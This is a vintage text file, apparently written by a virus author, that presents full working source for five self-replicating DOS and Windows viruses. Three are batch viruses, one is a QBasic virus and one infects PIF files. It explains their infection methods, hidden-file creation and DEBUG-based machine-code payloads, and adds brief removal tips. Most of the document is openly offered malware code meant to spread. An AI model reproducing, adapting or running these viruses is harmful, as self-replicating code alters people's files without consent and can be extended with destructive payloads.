All of these replicating programs require standard MSDOS 6 to function

1. All of these replicating programs require standard MSDOS 6 to function
2. properly. The FIND command must return an errorlevel or they won't work.
3.  
4. I'll despense with the boring warnings, suffice it to say if you utilize
5. any of this in a irresponsible or damaging way then you are responsible
6. for whatever your actions cause.
7.  
8. As written these programs are not damaging to data and will only affect
9. BAT, BAS and PIF files. One could say this is still data but no malice is
10. intended. Art maybe. Others might not be so nice - batch viruses are
11. perfectly capable of carrying deadly payloads.
12.  
13. Recovery from these creatures is easy - load the batch or basic file into
14. EDIT and remove the added virus code. In the case of the PIF virus use
15. the Windows PifEdit program to change the ...bat in the filename field
16. back to ...com or ...exe and remove the hidden companion batch. Some of
17. these viruses make hidden files, use 'DIR \ /AH /S' to find them then for
18. each file that is actually a virus issue 'ATTRIB file -H' then 'DEL file'.
19. Make sure you remove only virus files, leave hidden system files like
20. MSDOS.SYS and IO.SYS (and others) alone!
21.  
22.  
23. About batch viruses
24. -------------------
25.  
26. Reproducing batch programs use the FIND command to separate its code
27. from the program that code is attached to. For this to work, every
28. replicating line in the virus must contain a specific string, the key
29. string of the virus. Another vital component of a replicating batch
30. is the FOR command, used to scan for other batch files, usually with
31. the mask "*.BAT". A variety of commands can be used for the actual
32. infection, including FIND, TYPE, ECHO, COPY and MOVE. Simple batch
33. replicators just append their code at the end of batches in the hopes
34. it will run (usually it does). Advanced infectors modify the start of
35. the batch to force the issue. In such cases the added first line does
36. not contain the key string but is added by an ECHO within the virus.
37.  
38. This is not the only type of batch virus! Batch viruses can be written
39. in assembly and use either DEBUG or ECHO to hide the virus code in hex
40. or text which is attached to infected batches. These tend to be very
41. advanced. A batch file can also rename a binary then copy itself to a
42. batch with the same base name. This one's been around for a while.
43.  
44. Most of the viruses presented here become a self contained part of the
45. host, giving them that coveted ability of travel. Machine code is used
46. only for specific functions, not for reproduction. That is done with
47. plain old DOS. Only DOS 6 seems vulnerable to these types of viruses,
48. I have no information on PCDOS, 4DOS or other operating environments.
49. They run on my system and probably on many others.
50.  
51. At the end of this document is an encoded batch that will detect most
52. (practically all) batch viruses of this type and also suspicious code
53. that might indicate a trojan or advanced batch virus of the assembly
54. type. Use a UU decoder to extract the file "BATALERT.BAT".
55.  
56.  
57. Batch virus "_!"
58. ----------------
59.  
60. Infects parent and current directories
61. Virus code is appended to the host batch
62. Only works if host is in current directory
63. Infects just one batch unless new clean batches are added
64.  
65. This is a very simple batch virus. When it runs it appends its code
66. to another batch file in the parent or current directory. It is not
67. very effective but illustrates the basics.
68.  
69. ----------------------------(cut here)------------------------------------
70. @ctty nul._!
71. for %%a in (*.bat ..\*.bat) do set _!=%%a
72. find "_!"<%_!%
73. if errorlevel 1 find "_!"<%0.BAT>>%_!%
74. ctty con._!
75. ----------------------------(cut here)------------------------------------
76.  
77.  
78. Batch virus "BfV"
79. -----------------
80.  
81. Creates the hidden file "_BFV" in the root directory of drive C
82. Infects one batch per run in current and parent directories
83. Gives up after encountering seven infected batches
84. Virus code is appended to the host batch
85.  
86. This is an improved appender. It only has to be run from its own directory
87. once to enable it to reproduce even when the host is in a path directory.
88. To avoid slowing batch files down too much it exits if it can't infect
89. after checking seven batch files. If the host batch ends with nul characters
90. it removes them so the virus code will run.
91.  
92. ----------------------------(cut here)------------------------------------
93. @echo off%[BfV_B]%
94. if '%1=='## goto BfV_%2
95. if exist C:\_BfV.bat goto BfV_
96. if not exist %0.bat goto BfV_end
97. find "BfV"<%0.bat>C:\_BfV.bat
98. attrib C:\_BfV.bat +h
99. :BfV_
100. command /e:5000 /c C:\_BfV ## run
101. goto BfV_end
102. :BfV_run
103. for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
104. exit BfV
105. :BfV_inf
106. if '%BfV%=='1111111 exit
107. set BfV=%BfV%1
108. find "BfV"<%3>nul
109. if not errorlevel 1 goto BfV_end
110. type %3>BfV
111. type C:\_BfV.bat>>BfV
112. move BfV %3>nul
113. exit BfV
114. :BfV_end
115. ----------------------------(cut here)------------------------------------
116.  
117.  
118. Batch virus "MeLT"
119. ------------------
120.  
121. Creates the hidden file "MELT_2A" in the temp directory
122. Infects files in the current, parent and all path directories
123. Infects one batch per run if less than ten infected files encountered
124. After detecting ten infected files it displays a graphics screen effect
125. Adds one line before the host batch and appends the rest
126. Will not run if attached to AUTOEXEC.BAT (but infects it)
127.  
128. This batch virus is much more advanced. It takes control from the host
129. immediately, runs the virus then runs the host batch. The host is run in
130. such a way as to disable the virus until the host is completely finished
131. to avoid slowing down batch files that call themselves in a loop. Simple
132. appenders are very obvious when on such files, but this one causes no
133. significant speed loss except at startup. This virus carries a harmless
134. payload which is assembled with the debug command - it 'melts' the screen
135. in a flash of color then returns it to normal before running the host.
136.  
137. ----------------------------(cut here)------------------------------------
138. @if not '%0==' if '%_melt%==' goto meltbeg
139. ::---- dummy host --------
140. @echo off
141. echo Hello World!
142. ::---- end dummy host ----
143.  
144. @goto MeLTend [MeLT_2a]
145. :MeLTbeg
146. @echo off%_MeLT%
147. if '%1=='MeLT goto MeLT%2
148. if not exist %comspec% set comspec=%_MeLT%command
149. %comspec% /e:5000 /c %0 MeLT vir
150. set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
151. call %0 MeLT rh
152. set _MeLT=
153. set MeLTcl=
154. goto MeLTend
155. :MeLTrh
156. set _MeLT=x
157. %0 %MeLTcl%
158. :MeLTvir
159. set MeLTH=%0
160. if not exist %_MeLT%%temp%\nul set temp=%tmp%
161. if exist %temp%\MeLT_2a goto MeLTrun
162. %0 MeLT fnd . %path%
163. :MeLTfnd
164. shift%_MeLT%
165. if '%2==' exit MeLT
166. set MeLT=%2\%MeLTH%.bat
167. if not exist %MeLT% set MeLT=%2\%MeLTH%
168. if not exist %MeLT% set MeLT=%2%MeLTH%.bat
169. if not exist %MeLT% set MeLT=%2%MeLTH%
170. if not exist %MeLT% goto MeLTfnd
171. find "MeLT"<%MeLT%>%temp%\MeLT_2a
172. attrib %temp%\MeLT_2a +h
173. :MeLTrun
174. %MeLTH% MeLT s . .. %path%
175. :MeLTs
176. shift%_MeLT%
177. if '%2==' exit MeLT
178. for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
179. goto MeLTs
180. :MeLTinf
181. find /i "MeLT"<%3>nul
182. if not errorlevel 1 goto MeLTno
183. echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
184. type %3>>MeLT.t
185. echo.>>MeLT.t
186. type %temp%\MeLT_2a>>MeLT.t
187. move MeLT.t %3>nul
188. exit MeLT
189. :MeLTact - flash-melt screen text then put back to normal
190. echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
191. echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
192. echo e 120 B4 4C CD 21 00>>MeLT.t
193. echo g>>MeLT.t
194. debug<MeLT.t>nul
195. del MeLT.t
196. exit MeLT
197. :MeLTno
198. set MeLTC=%MeLTC%1
199. if %MeLTC%==1111111111 goto MeLTact
200. :MeLTend
201. ----------------------------(cut here)------------------------------------
202.  
203.  
204. QBasic virus "BasVir"
205. ---------------------
206.  
207. Infects one BAS file in the current directory per run
208. Inserts its code in front of the host so it will run first
209. Does not infect QBasic programs that contain "DECLARE"
210. Really a batch virus that hides in BASIC code
211. If the host is renamed the virus won't work
212.  
213. I wrote this in response to someone's request on the net for a virus
214. written in BASIC. I hope they don't mind if the BASIC program makes
215. a batch and runs it. It stays out of programs that use procedures to
216. avoid causing errors, such programs cannot tolerate prepended code.
217. This is really a joke, but it's a QBasic virus (no? you write one.)
218.  
219. The following must be named BASVIR.BAS to function.
220.  
221. ----------------------------(cut here)------------------------------------
222. basvirH$ = "BASVIR.BAS"
223. OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir
224. PRINT #2, "@echo off %BasVir1%"
225. PRINT #2, "if '%1=='BasVir goto BasVir%2"
226. PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a"
227. PRINT #2, "exit": REM BasVir
228. PRINT #2, ":BasVir2"
229. PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<%3>nul": REM BasVir
230. PRINT #2, "if not errorlevel 1 goto BasVirE"
231. PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir
232. PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<"; basvirH$; ">>~1"
233. PRINT #2, "copy %3 ~2>nul": REM BasVir
234. PRINT #2, "copy /b ~1+~2 %3>nul": REM BasVir
235. PRINT #2, "exit": REM BasVir
236. PRINT #2, ":BasVirE"
237. CLOSE #2: REM BasVir
238. SHELL "~$": REM BasVir
239. SHELL "del ~?.*": REM BasVir
240. REM ******* [BasVir] the QBasic Virus *******
241. REM This is a dummy host program
242. SYSTEM
243. ----------------------------(cut here)------------------------------------
244.  
245.  
246. PIF virus "PiFV"
247. ----------------
248.  
249. Creates hidden batch files with the same base name as host
250. Modifies PIF to run the hidden batch instead of host program
251. After infecting more PIFs the companion batch runs the host
252. Sometimes displays a stupid message on Saturdays (it was late)
253.  
254. This might be the first PIF virus. One problem with PIF infection is
255. the PIF file must be actually run or it won't work. If the user runs
256. the actual program the virus won't work. It has other problems but is
257. functional enough for a demo. I don't feel up to fixing it right now.
258. It's pretty infectious right now...
259.  
260. ----------------------------(cut here)------------------------------------
261. :: Windows PIF Virus (in batch!)
262. :: Prog by WaveFunc May 13, 1995
263. :: (these comments will not replicate)
264. ::
265. :: This is a virus that 'infects' PIF files, used by Windows to
266. :: run DOS programs. It works by creating hidden companion batches
267. :: containing copies of this then altering the PIF file so that the
268. :: companion batch runs first. After the companion runs it runs the
269. :: original host program, the name of which is encoded into the
270. :: companion. The pif files are marked so that they will not be
271. :: re-infected. Only PIFs are affected, no changes are made to
272. :: the infected programs. To 'cure', use PIFEDIT to restore the
273. :: original filenames then delete the hidden files.
274. ::
275. @echo off
276. :: host filename...
277. set pifvo=LIST.COM
278. :: loop dispatcher...
279. if '%1=='PiFV goto PiFV_%2
280. :: run the virus!
281. set _PiFV=
282. if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
283. %comspec% /e:5000 /c %0 PiFV go>nul
284. if exist PiFV! del PiFV!
285. :: run the host
286. set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
287. call %0 PiFV hst
288. set PiFVo=
289. set PiFVcl=
290. :: check for activation...
291. echo.|date|find /i "sat">nul.PiFV
292. if errorlevel 1 goto PiFV_end
293. echo.|time|find "7">nul.PiFV
294. if errorlevel 1 goto PiFV_msg
295. set PiFV=echo
296. cls%_PiFV%
297. %PiFV%.
298. %PiFV% There once was an Otter named Oscer
299. %PiFV% Who claimed to know how to make water.
300. %PiFV% "No more dams," he said, "use my water instead!"
301. %PiFV% But the Elder Otter was not impressed.
302. pause>nul.PiFV
303. set PiFV=
304. goto PiFV_end
305. :PiFV_msg
306. echo [PiFV] by WaveFunc
307. goto PiFV_end
308. :PiFV_hst
309. %PiFVo% %PiFVcl%
310. goto PiFV_end
311. :PiFV_go
312. set PiFVh=%0
313. if not exist %PiFVh% set PiFVh=%0.bat
314. if not exist %PiFVh% exit
315. for %%a in (*.pif) do call %0 PiFV inf %%a
316. exit PiFV
317. :PiFV_inf
318. set PiFVp=%3
319. :: get victim filename and infection marker
320. :: from PIF file using debug...
321. if exist PiFV! goto PiFV_1
322. echo m 124,162 524>PiFV!
323. echo e 100 '@set fn='>>PiFV!
324. echo m 524,562 108>>PiFV!
325. echo n pifv$.bat>>PiFV!
326. echo rcx>>PiFV!
327. echo 47>>PiFV!
328. echo w>>PiFV!
329. echo m 55E,561 108>>PiFV!
330. echo e 10C 0>>PiFV!
331. echo n pifv$$.bat>>PiFV!
332. echo rcx>>PiFV!
333. echo 10>>PiFV!
334. echo w>>PiFV!
335. echo q>>PiFV!
336. :PiFV_1
337. debug %PiFVp%<PiFV!>nul
338. call PiFV$
339. set PiFVn=%fn%
340. call PiFV$$
341. set PiFVi=%fn%
342. del PiFV$?.bat
343. :: pifvn=orig filename
344. :: pifvi=infection marker
345. :: pifvp=pif filename
346. :: pifvh=companion bat file
347. :: skip infected or 'empty' pifs...
348. if '%PiFVi%=='PiFV goto PiFV_end
349. if '%PiFVn%==' goto PiFV_end
350. :: don't shadow command.com (be nice)
351. echo %PiFVn%|find /i "command">nul
352. if not errorlevel 1 goto PiFV_end
353. :: infectable - create a companion batch...
354. :: (the following code strips off the extension)
355. echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
356. echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
357. echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
358. echo n pifv$.com>>PiFV$$
359. echo rcx>>PiFV$$
360. echo 2a>>PiFV$$
361. echo w>>PiFV$$
362. echo q>>PiFV$$
363. debug<PiFV$$>nul
364. echo %PiFVn%|PiFV$>PiFV$$.bat
365. call PiFV$$
366. set PiFVb=%fn%.bat
367. del PiFV$?.*
368. :: pifvb=new batch name
369. :: do not shadow if comp has same name as host
370. if %PiFVo%==%PiFVb% goto PiFV_end
371. if exist %PiFVb% goto PiFV_end
372. echo @echo off>%PiFVb%
373. echo set pifvo=%pifvn%>>%PiFVb%
374. find "PiFV"<%PiFVh%>>%PiFVb%
375. attrib %PiFVb% +h
376. :: ...and point the PIF at the companion
377. echo e 15E 'PiFV',0>PiFV$$
378. echo e 124 '%PiFVb%',0>>PiFV$$
379. echo w>>PiFV$$
380. echo q>>PiFV$$
381. debug %PiFVp%<PiFV$$>nul
382. del PiFV$$
383. :: I think we're done!
384. exit PiFV
385. :PiFV_end
386. :: wonder how many bugs all this has in it? Only one
387. :: way to find out...